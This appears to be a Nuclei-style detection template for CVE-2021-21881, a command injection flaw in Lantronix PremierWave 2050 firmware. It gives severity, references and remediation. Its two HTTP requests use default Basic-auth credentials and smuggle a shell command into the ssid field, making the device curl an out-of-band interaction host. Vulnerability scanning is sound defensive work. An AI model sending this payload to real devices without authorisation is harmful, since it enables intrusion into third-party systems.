id: CVE-2021-21881 info: name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection author: gy741 severity: critical description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability. remediation: | Apply the latest firmware update provided by Lantronix to mitigate the vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325 - https://nvd.nist.gov/vuln/detail/CVE-2021-21881 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-21881 cwe-id: CWE-78 epss-score: 0.97194 epss-percentile: 0.99757 cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:* metadata: max-request: 2 vendor: lantronix product: premierwave_2050_firmware tags: cve,cve2021,lantronix,rce,oast,cisco variables: useragent: '{{rand_base(6)}}' http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Authorization: Basic dXNlcjp1c2Vy Content-Type: application/x-www-form-urlencoded ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' # - | POST / HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46UEFTUw== Content-Type: application/x-www-form-urlencoded ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' stop-at-first-match: true matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: word part: interactsh_request words: - "User-Agent: {{useragent}}" # digest: 4b0a004830460221009d3b2c902d578751a8a92e58512cffe2058eb2e3c63cbbfd0fccfd2123af529a022100eade10232fbd96faae4b1536e5b2f222587b2d8780ea5cb4704d3bfc90b0ee95:922c64590222798bb761d5b6d8e72950